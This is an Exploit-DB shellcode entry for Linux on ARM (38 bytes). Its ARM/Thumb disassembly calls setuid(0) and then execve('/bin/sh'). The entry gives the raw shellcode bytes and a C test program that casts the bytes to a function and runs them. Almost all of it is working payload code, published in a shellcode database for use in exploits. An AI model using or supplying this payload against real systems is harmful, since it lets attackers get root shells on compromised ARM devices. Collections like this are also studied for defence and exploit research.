Linux/ARM - setuid(0) + execve("/bin/sh","/bin/sh",0) Shellcode (38 bytes)

EDB-ID:

14113

CVE:

N/A




Platform:

ARM

Date:

2010-06-29


/*
Title:  Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes
Date:   2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)

Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/jonathansalwan

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/


    8054:	e28f3001 	add	r3, pc, #1	; 0x1
    8058:	e12fff13 	bx	r3
    805c:	1b24      	subs	r4, r4, r4
    805e:	1c20      	adds	r0, r4, #0
    8060:	2717      	movs	r7, #23
    8062:	df01      	svc	1
    8064:	4678      	mov	r0, pc
    8066:	300a      	adds	r0, #10
    8068:	9001      	str	r0, [sp, #4]
    806a:	a901      	add	r1, sp, #4
    806c:	1a92      	subs	r2, r2, r2
    806e:	270b      	movs	r7, #11
    8070:	df01      	svc	1
    8072:	2f2f      	cmp	r7, #47
    8074:	6962      	ldr	r2, [r4, #20]
    8076:	2f6e      	cmp	r7, #110
    8078:	6873      	ldr	r3, [r6, #4]
*/

#include <stdio.h>

char *SC = "\x01\x30\x8f\xe2"
           "\x13\xff\x2f\xe1"
           "\x24\x1b\x20\x1c"
           "\x17\x27\x01\xdf"
           "\x78\x46\x0a\x30"
           "\x01\x90\x01\xa9"
           "\x92\x1a\x0b\x27"
           "\x01\xdf\x2f\x2f"
           "\x62\x69\x6e\x2f"
           "\x73\x68";


int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}